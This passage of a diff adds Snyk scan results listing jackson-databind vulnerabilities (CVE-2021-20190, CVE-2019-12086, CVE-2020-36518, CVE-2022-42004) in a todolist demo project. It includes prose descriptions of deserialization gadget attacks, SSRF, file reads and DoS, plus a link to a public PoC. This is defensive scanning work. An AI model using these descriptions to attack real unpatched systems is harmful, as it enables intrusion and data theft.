+ "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", + "epssDetails": { + "percentile": "0.74700", + "probability": "0.00431", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-20190" + ], + "CWE": [ + "CWE-502", + "CWE-918" + ], + "GHSA": [ + "GHSA-5949-rw7g-wx7w" + ], + "RHSA": [ + "RHSA-1610966837463990" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-18T12:50:16.466618Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-16T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-18T17:23:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:17.193594Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.7" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9)", + "[2.8.0,2.8.11.4)", + "[2.7.0,2.7.9.6)", + "[,2.6.7.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9", + "2.8.11.4", + "2.7.9.6", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2326", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", + "title": "Github Release Tag" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12086", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "assigner": "Red Hat", + 
"severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:55.897269Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", + "epssDetails": { + "percentile": "0.74218", + "probability": "0.00415", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12086" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5ww9-j83m-q7qx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-05-19T10:19:10.287403Z", + "functions_new": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-17T18:12:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": 
"maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-05-17T18:12:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.785293Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.12.6.1", + "2.13.2.1" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when using nested objects." 
+ }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", + "className": "UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2816", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/3416", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.056720Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", + "epssDetails": { + "percentile": "0.60309", + "probability": "0.00218", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36518" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-03-11T13:26:43.073121Z", + "functions_new": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": 
"com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-11T13:18:25Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-03-11T14:24:04Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.929583Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.12.6.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": 
[], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3582", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.201956Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "type": "secondary", + 
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", + "epssDetails": { + "percentile": "0.66401", + "probability": "0.00264", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42004" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:21:18.588353Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:07:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T10:05:31.043255Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.261115Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.12.7.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + 
"title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", + "title": "Chromium Bugs" + }, + { + "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", + "title": "Documentation" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3590", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:53:57.258948Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.284440Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
